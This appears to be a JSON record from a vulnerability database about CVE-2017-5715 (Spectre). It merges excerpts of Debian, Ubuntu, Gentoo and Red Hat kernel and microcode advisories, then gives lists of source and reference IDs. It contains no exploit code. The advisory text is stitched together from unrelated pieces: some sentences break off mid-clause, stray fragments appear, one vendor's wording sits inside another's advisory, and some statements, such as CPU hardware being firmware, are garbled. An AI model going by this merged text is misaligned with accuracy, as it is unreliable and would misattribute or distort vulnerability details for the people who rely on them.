    "data": "Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis. CPU hardware utilizing speculative execution may be vulnerable to cache timing side-channel analysis. Two vulnerabilities are identified, known as \"Variant 3a\" and \"Variant 4\". CPUhardware is a set of firmware that runs in the CPU (Central Processing Unit) for managing and controlling the CPU. The Meltdown vulnerability exists in the CPU processor core, which \\\"melts\\\" the security boundary implemented by hardware, allowing low-privileged user-level applications to \\\"cross-border\\\" access to system-level memory, causing data leakage. The following products and versions are affected: ARM Cortex-R7; Cortex-R8; Cortex-A8; Cortex-A9; Cortex-A12; Intel Xeon CPU E5-1650 v3, v2, v4 versions; Xeon E3-1265l v2, v3, v4 Version; Xeon E3-1245 v2, v3, v5, v6 versions; Xeon X7542, etc. Description:\n\nKernel-based Virtual Machine (KVM) is a full virtualization solution for\nLinux on a variety of architectures. The qemu-kvm-rhev packages provide the\nuser-space component for running virtual machines that use KVM in\nenvironments managed by Red Hat products. Once\nall virtual machines have shut down, start them again for this update to\ntake effect. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4188-1                   security@debian.org\nhttps://www.debian.org/security/                     Salvatore Bonaccorso\nMay 01, 2018                          https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage        : linux\nCVE ID         : CVE-2017-5715 CVE-2017-5753 CVE-2017-17975 CVE-2017-18193\n                 CVE-2017-18216 CVE-2017-18218 CVE-2017-18222 CVE-2017-18224\n                 CVE-2017-18241 CVE-2017-18257 CVE-2018-1065 CVE-2018-1066\n                 CVE-2018-1068 CVE-2018-1092 CVE-2018-1093 CVE-2018-1108\n                 CVE-2018-5803 CVE-2018-7480 CVE-2018-7566 CVE-2018-7740\n                 CVE-2018-7757 CVE-2018-7995 CVE-2018-8087 CVE-2018-8781\n                 CVE-2018-8822 CVE-2018-10323 CVE-2018-1000199\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks. \n\nCVE-2017-5715\n\n    Multiple researchers have discovered a vulnerability in various\n    processors supporting speculative execution, enabling an attacker\n    controlling an unprivileged process to read memory from arbitrary\n    addresses, including from the kernel and all other processes\n    running on the system. \n\n    This specific attack has been named Spectre variant 2 (branch\n    target injection) and is mitigated for the x86 architecture (amd64\n    and i386) by using the \"retpoline\" compiler feature which allows\n    indirect branches to be isolated from speculative execution. \n\nCVE-2017-5753\n\n    Multiple researchers have discovered a vulnerability in various\n    processors supporting speculative execution, enabling an attacker\n    controlling an unprivileged process to read memory from arbitrary\n    addresses, including from the kernel and all other processes\n    running on the system. \n\n    This specific attack has been named Spectre variant 1\n    (bounds-check bypass) and is mitigated by identifying vulnerable\n    code sections (array bounds checking followed by array access) and\n    replacing the array access with the speculation-safe\n    array_index_nospec() function. \n\n    More use sites will be added over time. \n\nCVE-2017-17975\n\n    Tuba Yavuz reported a use-after-free flaw in the USBTV007\n    audio-video grabber driver. A local user could use this for denial\n    of service by triggering failure of audio registration. \n\nCVE-2017-18193\n\n    Yunlei He reported that the f2fs implementation does not properly\n    handle extent trees, allowing a local user to cause a denial of\n    service via an application with multiple threads. \n\nCVE-2017-18216\n\n    Alex Chen reported that the OCFS2 filesystem failed to hold a\n    necessary lock during nodemanager sysfs file operations,\n    potentially leading to a null pointer dereference.  A local user\n    could use this for denial of service. \n\nCVE-2017-18218\n\n    Jun He reported a user-after-free flaw in the Hisilicon HNS ethernet\n    driver. A local user could use this for denial of service. \n\nCVE-2017-18222\n\n    It was reported that the Hisilicon Network Subsystem (HNS) driver\n    implementation does not properly handle ethtool private flags. A\n    local user could use this for denial of service or possibly have\n    other impact. \n\nCVE-2017-18224\n\n    Alex Chen reported that the OCFS2 filesystem omits the use of a\n    semaphore and consequently has a race condition for access to the\n    extent tree during read operations in DIRECT mode. A local user\n    could use this for denial of service. \n\nCVE-2017-18241\n\n    Yunlei He reported that the f2fs implementation does not properly\n    initialise its state if the \"noflush_merge\" mount option is used. \n    A local user with access to a filesystem mounted with this option\n    could use this to cause a denial of service. \n\nCVE-2017-18257\n\n    It was reported that the f2fs implementation is prone to an infinite\n    loop caused by an integer overflow in the __get_data_block()\n    function. A local user can use this for denial of service via\n    crafted use of the open and fallocate system calls with an\n    FS_IOC_FIEMAP ioctl. \n\nCVE-2018-1065\n\n    The syzkaller tool found a NULL pointer dereference flaw in the\n    netfilter subsystem when handling certain malformed iptables\n    rulesets. A local user with the CAP_NET_RAW or CAP_NET_ADMIN\n    capability (in any user namespace) could use this to cause a denial\n    of service. Debian disables unprivileged user namespaces by default. \n\nCVE-2018-1066\n\n    Dan Aloni reported to Red Hat that the CIFS client implementation\n    would dereference a null pointer if the server sent an invalid\n    response during NTLMSSP setup negotiation.  This could be used\n    by a malicious server for denial of service. \n\nCVE-2018-1068\n\n    The syzkaller tool found that the 32-bit compatibility layer of\n    ebtables did not sufficiently validate offset values. On a 64-bit\n    kernel, a local user with the CAP_NET_ADMIN capability (in any user\n    namespace) could use this to overwrite kernel memory, possibly\n    leading to privilege escalation. Debian disables unprivileged user\n    namespaces by default. \n\nCVE-2018-1092\n\n    Wen Xu reported that a crafted ext4 filesystem image would\n    trigger a null dereference when mounted.  A local user able\n    to mount arbitrary filesystems could use this for denial of\n    service. \n\nCVE-2018-1093\n\n    Wen Xu reported that a crafted ext4 filesystem image could trigger\n    an out-of-bounds read in the ext4_valid_block_bitmap() function. A\n    local user able to mount arbitrary filesystems could use this for\n    denial of service. \n\nCVE-2018-1108\n\n    Jann Horn reported that crng_ready() does not properly handle the\n    crng_init variable states and the RNG could be treated as\n    cryptographically safe too early after system boot. \n\nCVE-2018-5803\n\n    Alexey Kodanev reported that the SCTP protocol did not range-check\n    the length of chunks to be created.  A local or remote user could\n    use this to cause a denial of service. \n\nCVE-2018-7480\n\n    Hou Tao discovered a double-free flaw in the blkcg_init_queue()\n    function in block/blk-cgroup.c. A local user could use this to cause\n    a denial of service or have other impact. \n\nCVE-2018-7566\n\n    Fan LongFei reported a race condition in the ALSA (sound)\n    sequencer core, between write and ioctl operations.  This could\n    lead to an out-of-bounds access or use-after-free.  A local user\n    with access to a sequencer device could use this for denial of\n    service or possibly for privilege escalation. \n\nCVE-2018-7740\n\n    Nic Losby reported that the hugetlbfs filesystem\u0027s mmap operation\n    did not properly range-check the file offset.  A local user with\n    access to files on a hugetlbfs filesystem could use this to cause\n    a denial of service. \n\nCVE-2018-7757\n\n    Jason Yan reported a memory leak in the SAS (Serial-Attached\n    SCSI) subsystem.  A local user on a system with SAS devices\n    could use this to cause a denial of service. \n\nCVE-2018-7995\n\n    Seunghun Han reported a race condition in the x86 MCE\n    (Machine Check Exception) driver.  This is unlikely to have\n    any security impact. \n\nCVE-2018-8087\n\n    A memory leak flaw was found in the hwsim_new_radio_nl() function in\n    the simulated radio testing tool driver for mac80211, allowing a\n    local user to cause a denial of service. \n\nCVE-2018-8781\n\n    Eyal Itkin reported that the udl (DisplayLink) driver\u0027s mmap\n    operation did not properly range-check the file offset.  A local\n    user with access to a udl framebuffer device could exploit this to\n    overwrite kernel memory, leading to privilege escalation. \n\nCVE-2018-8822\n\n    Dr Silvio Cesare of InfoSect reported that the ncpfs client\n    implementation did not validate reply lengths from the server.  An\n    ncpfs server could use this to cause a denial of service or\n    remote code execution in the client. \n\nCVE-2018-10323\n\n    Wen Xu reported a NULL pointer dereference flaw in the\n    xfs_bmapi_write() function triggered when mounting and operating a\n    crafted xfs filesystem image. A local user able to mount arbitrary\n    filesystems could use this for denial of service. \n\nCVE-2018-1000199\n\n    Andy Lutomirski discovered that the ptrace subsystem did not\n    sufficiently validate hardware breakpoint settings.  Local users\n    can use this to cause a denial of service, or possibly for\n    privilege escalation, on x86 (amd64 and i386) and possibly other\n    architectures. \n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 4.9.88-1. \n\nWe recommend that you upgrade your linux packages. \n\nFor the detailed security status of linux please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlron7dfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0Se0xAAmR31jrqeEkJhgh7qvKplrko9N27l7FCCrrqsR0cBjKtIpwBkIdm6UxP2\n8HBxqK5oy3sUP/ViHBtTUqFlRbLq4fC2DsuJGGqtBk46yML4QOEV2CXA1gyhfSzG\nux5Z5nNkLDbzD7jPazbTwMusbQrDItojj6K5aoDVoRjjOpRHRViHv81kRU3KJytX\n62f/vnEjxX0xkSOqLKXcUNDczLjcP2VxuKFb3si6w7YyCXq6XYhvoDch92QLJZfD\nqtDUCKs1sEgWLzhktcYyhck3NGujSfLZuSLGnZowqGqaAvx/lq0sTOliKuPpnG+I\nHztPR0iYQCuzsDgHbLlwGyuUnf446VRG+u/AP69qk0HqyWwCXqsTJ0rwMX04fXtR\n7dR8Y1jbbXaH0+ai9V6c3zdz4UKH5rZOkpIIYSjCxVHUpE2cU4lFXYiWL/qJRBGV\n150TtSgyAPBBBJa6cWgApXrHgriGEkZNscH2nmJfg2OBnDwnLJ4CvwNfij7daR8n\nRlGOlvgKYCI1Ob54kKqvvxQhDrhTiBhti8T64wd2MzsrKLIRdlyTpSrsqK8VIJyg\nux1Y01sgA3JqS2XKL52ZTgCJhGkoX68+/se73P+jeRBP/tbNcXB2t2cE6gxIkiTX\neZEUmnS5IeoEcr7cYKm3M9GZvBBrVeTaFra3vSgeGDUr0XL2Yu4=\n=uZGQ\n-----END PGP SIGNATURE-----\n. 6) - i386, x86_64\n\n3. Description:\n\nThe microcode_ctl packages provide microcode updates for Intel and AMD\nprocessors. Ubuntu users with a processor from a different vendor should\ncontact the vendor to identify necessary firmware updates. Ubuntu\nwill provide corresponding QEMU updates in the future for users of\nself-hosted virtual environments in coordination with upstream QEMU. \nUbuntu users in cloud environments should contact the cloud provider\nto confirm that the hypervisor has been updated to expose the new\nCPU features to virtual machines. 6.7) - x86_64\n\n3. Description:\n\nThe libvirt library contains a C API for managing and interacting with the\nvirtualization capabilities of Linux and other operating systems. In\naddition, libvirt provides tools for remote management of virtualized\nsystems. (CVE-2017-5715)\n\nNote: This is the libvirt side of the CVE-2017-5715 mitigation. \n\n    This specific attack has been named Meltdown and is addressed in the\n    Linux kernel on the powerpc/ppc64el architectures by flushing the L1\n    data cache on exit from kernel mode to user mode (or from hypervisor to\n    kernel). \n    \n    This works on Power7, Power8 and Power9 processors. Memory protections ensuring user-provided buffers always\n    point to userland memory were disabled, allowing . The\n    acpi_smbus_hc_add() prints a kernel address in the kernel log at every\n    boot, which could be used by an attacker on the system to defeat kernel\n    ASLR. \n\nAdditionnaly to those vulnerability, some mitigations for CVE-2017-5753 are\nincluded in this release. ==========================================================================\nUbuntu Security Notice USN-3620-2\nApril 05, 2018\n\nlinux-lts-trusty vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu\n12.04 ESM. This flaw is known as Spectre. (CVE-2017-5715)\n\nIt was discovered that the netlink 802.11 configuration interface in the\nLinux kernel did not properly validate some attributes passed from\nuserspace. (CVE-2017-11089)\n\nIt was discovered that a buffer overflow existed in the ioctl handling code\nin the ISDN subsystem of the Linux kernel. (CVE-2017-12762)\n\nIt was discovered that the netfilter component of the Linux did not\nproperly restrict access to the connection tracking helpers list. \n(CVE-2017-17448)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux kernel\ncontained an out-of-bounds read when handling memory-mapped I/O. (CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm implementations in\nthe Linux kernel did not properly handle zero-length inputs. \n(CVE-2017-17805)\n\nIt was discovered that the keyring implementation in the Linux kernel did\nnot properly check permissions when a key request was performed on a\ntask\u0027s default keyring. A local attacker could use this to add keys to\nunauthorized keyrings. (CVE-2017-17807)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the\nLinux kernel did not properly validate Generic Segment Offload (GSO) packet\nsizes. (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS) implementation in\nthe Linux kernel contained an out-of-bounds write during RDMA page\nallocation. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nBackground\n==========\n\nXen is a bare-metal hypervisor. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  app-emulation/xen          \u003c 4.10.1-r2              \u003e= 4.10.1-r2\n  2  app-emulation/xen-tools    \u003c 4.10.1-r2              \u003e= 4.10.1-r2\n    -------------------------------------------------------------------\n     2 affected packages\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in Xen. Please review the\nreferenced CVE identifiers for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Xen users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=app-emulation/xen-4.10.1-r2\"\n\nAll Xen tools users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot -v \"\u003e=app-emulation/xen-tools-4.10.1-r2\"\n\nReferences\n==========\n\n[  1 ] CVE-2017-5715\n       https://nvd.nist.gov/vuln/detail/CVE-2017-5715\n[  2 ] CVE-2017-5753\n       https://nvd.nist.gov/vuln/detail/CVE-2017-5753\n[  3 ] CVE-2017-5754\n       https://nvd.nist.gov/vuln/detail/CVE-2017-5754\n[  4 ] CVE-2018-10471\n       https://nvd.nist.gov/vuln/detail/CVE-2018-10471\n[  5 ] CVE-2018-10472\n       https://nvd.nist.gov/vuln/detail/CVE-2018-10472\n[  6 ] CVE-2018-10981\n       https://nvd.nist.gov/vuln/detail/CVE-2018-10981\n[  7 ] CVE-2018-10982\n       https://nvd.nist.gov/vuln/detail/CVE-2018-10982\n[  8 ] CVE-2018-12891\n       https://nvd.nist.gov/vuln/detail/CVE-2018-12891\n[  9 ] CVE-2018-12892\n       https://nvd.nist.gov/vuln/detail/CVE-2018-12892\n[ 10 ] CVE-2018-12893\n       https://nvd.nist.gov/vuln/detail/CVE-2018-12893\n[ 11 ] CVE-2018-15468\n       https://nvd.nist.gov/vuln/detail/CVE-2018-15468\n[ 12 ] CVE-2018-15469\n       https://nvd.nist.gov/vuln/detail/CVE-2018-15469\n[ 13 ] CVE-2018-15470\n       https://nvd.nist.gov/vuln/detail/CVE-2018-15470\n[ 14 ] CVE-2018-3620\n       https://nvd.nist.gov/vuln/detail/CVE-2018-3620\n[ 15 ] CVE-2018-3646\n       https://nvd.nist.gov/vuln/detail/CVE-2018-3646\n[ 16 ] CVE-2018-5244\n       https://nvd.nist.gov/vuln/detail/CVE-2018-5244\n[ 17 ] CVE-2018-7540\n       https://nvd.nist.gov/vuln/detail/CVE-2018-7540\n[ 18 ] CVE-2018-7541\n       https://nvd.nist.gov/vuln/detail/CVE-2018-7541\n[ 19 ] CVE-2018-7542\n       https://nvd.nist.gov/vuln/detail/CVE-2018-7542\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201810-06\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2018 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.2\nAdvanced Update Support, Red Hat Enterprise Linux 7.2 Telco Extended Update\nSupport, and Red Hat Enterprise Linux 7.2 Update Services for SAP\nSolutions. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Server AUS (v. 7.2) - noarch, x86_64\nRed Hat Enterprise Linux Server E4S (v. 7.2) - noarch, x86_64\nRed Hat Enterprise Linux Server TUS (v. 7.2) - noarch, x86_64\n\n3. \n\nSecurity Fix(es):\n\nAn industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of instructions (a commonly\nused performance optimization). There are three primary variants of the\nissue which differ in the way the speculative execution can be exploited. \n\nNote: This issue is present in hardware and cannot be fully fixed via\nsoftware update. The updated kernel packages provide software mitigation\nfor this hardware issue at a cost of potential performance penalty. Please\nrefer to References section for further information about this issue and\nthe performance impact. \n\nIn this update mitigations for x86-64 architecture are provided. \n\nVariant CVE-2017-5753 triggers the speculative execution by performing a\nbounds-check bypass. It relies on the presence of a precisely-defined\ninstruction sequence in the privileged code as well as the fact that memory\naccesses may cause allocation into the microprocessor\u0027s data cache even for\nspeculatively executed instructions that never actually commit (retire). As\na result, an unprivileged attacker could use this flaw to cross the syscall\nboundary and read privileged memory by conducting targeted cache\nside-channel attacks. It relies on the presence of a precisely-defined\ninstruction sequence in the privileged code as well as the fact that memory\naccesses may cause allocation into the microprocessor\u0027s data cache even for\nspeculatively executed instructions that never actually commit (retire). As\na result, an unprivileged attacker could use this flaw to cross the syscall\nand guest/host boundaries and read privileged memory by conducting targeted\ncache side-channel attacks. (CVE-2017-5715, Important)\n\nVariant CVE-2017-5754 relies on the fact that, on impacted microprocessors,\nduring speculative execution of instruction permission faults, exception\ngeneration triggered by a faulting access is suppressed until the\nretirement of the whole instruction block. In a combination with the fact\nthat memory accesses may populate the cache even when the block is being\ndropped and never committed (executed), an unprivileged local attacker\ncould use this flaw to read privileged (kernel space) memory by conducting\ntargeted cache side-channel attacks. (CVE-2017-5754, Important)\n\nNote: CVE-2017-5754 affects Intel x86-64 microprocessors. AMD x86-64\nmicroprocessors are not affected by this issue. \n\nRed Hat would like to thank Google Project Zero for reporting these issues. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1519778 - CVE-2017-5753 hw: cpu: speculative execution bounds-check bypass\n1519780 - CVE-2017-5715 hw: cpu: speculative execution branch target injection\n1519781 - CVE-2017-5754 hw: cpu: speculative execution permission faults handling\n\n6. Package List:\n\nRed Hat Enterprise Linux Server AUS (v. 7.2):\n\nSource:\nkernel-3.10.0-327.62.4.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-327.62.4.el7.noarch.rpm\nkernel-doc-3.10.0-327.62.4.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-debug-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-devel-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-headers-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-tools-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-327.62.4.el7.x86_64.rpm\nperf-3.10.0-327.62.4.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm\npython-perf-3.10.0-327.62.4.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server E4S (v. 7.2):\n\nSource:\nkernel-3.10.0-327.62.4.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-327.62.4.el7.noarch.rpm\nkernel-doc-3.10.0-327.62.4.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-debug-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-devel-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-headers-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-tools-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-327.62.4.el7.x86_64.rpm\nperf-3.10.0-327.62.4.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm\npython-perf-3.10.0-327.62.4.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server TUS (v. 7.2):\n\nSource:\nkernel-3.10.0-327.62.4.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-327.62.4.el7.noarch.rpm\nkernel-doc-3.10.0-327.62.4.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-debug-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-devel-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-headers-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-tools-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-327.62.4.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-327.62.4.el7.x86_64.rpm\nperf-3.10.0-327.62.4.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm\npython-perf-3.10.0-327.62.4.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/speculativeexecution\nhttps://access.redhat.com/security/cve/CVE-2017-5753\nhttps://access.redhat.com/security/cve/CVE-2017-5715\nhttps://access.redhat.com/security/cve/CVE-2017-5754\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2018 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD4DBQFaTWPzXlSAg2UNWIIRAoXpAKCk1PNZ0v5ibBlDz1In1VOoIBh5kgCXda5D\noQnItcyXxYD6V03BxY+DbA==\n=jaFN\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-5715"
      },
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00302"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113918"
      },
      {
        "db": "PACKETSTORM",
        "id": "145710"
      },
      {
        "db": "PACKETSTORM",
        "id": "147454"
      },
      {
        "db": "PACKETSTORM",
        "id": "145650"
      },
      {
        "db": "PACKETSTORM",
        "id": "146771"
      },
      {
        "db": "PACKETSTORM",
        "id": "145653"
      },
      {
        "db": "PACKETSTORM",
        "id": "146167"
      },
      {
        "db": "PACKETSTORM",
        "id": "146008"
      },
      {
        "db": "PACKETSTORM",
        "id": "146530"
      },
      {
        "db": "PACKETSTORM",
        "id": "145673"
      },
      {
        "db": "PACKETSTORM",
        "id": "147067"
      },
      {
        "db": "PACKETSTORM",
        "id": "150083"
      },
      {
        "db": "PACKETSTORM",
        "id": "145635"
      }
    ],
    "trust": 3.33
  },
  "exploit_availability": {
    "_id": null,
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-113918",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-113918"
      }
    ]
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-5715",
        "trust": 2.9
      },
      {
        "db": "CERT/CC",
        "id": "VU#584653",
        "trust": 1.9
      },
      {
        "db": "CERT/CC",
        "id": "VU#180049",
        "trust": 1.9
      },
      {
        "db": "BID",
        "id": "102376",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "155281",
        "trust": 1.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145645",
        "trust": 1.1
      },
      {
        "db": "SECTRACK",
        "id": "1040071",
        "trust": 1.1
      },
      {
        "db": "LENOVO",
        "id": "LEN-18282",
        "trust": 1.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "43427",
        "trust": 1.1
      },
      {
        "db": "CERT@VDE",
        "id": "VDE-2018-003",
        "trust": 1.1
      },
      {
        "db": "CERT@VDE",
        "id": "VDE-2018-002",
        "trust": 1.1
      },
      {
        "db": "SIEMENS",
        "id": "SSA-608355",
        "trust": 1.1
      },
      {
        "db": "USCERT",
        "id": "TA18-141A",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00302",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "150083",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "146771",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "146167",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "146019",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145844",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146026",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146014",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146298",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145767",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146301",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146018",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "149917",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146009",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146556",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "148260",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145769",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146016",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145852",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145801",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146315",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "148446",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146762",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147179",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145800",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147582",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146308",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145768",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145964",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146283",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146772",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146017",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146957",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145853",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146015",
        "trust": 0.1
      },
      {
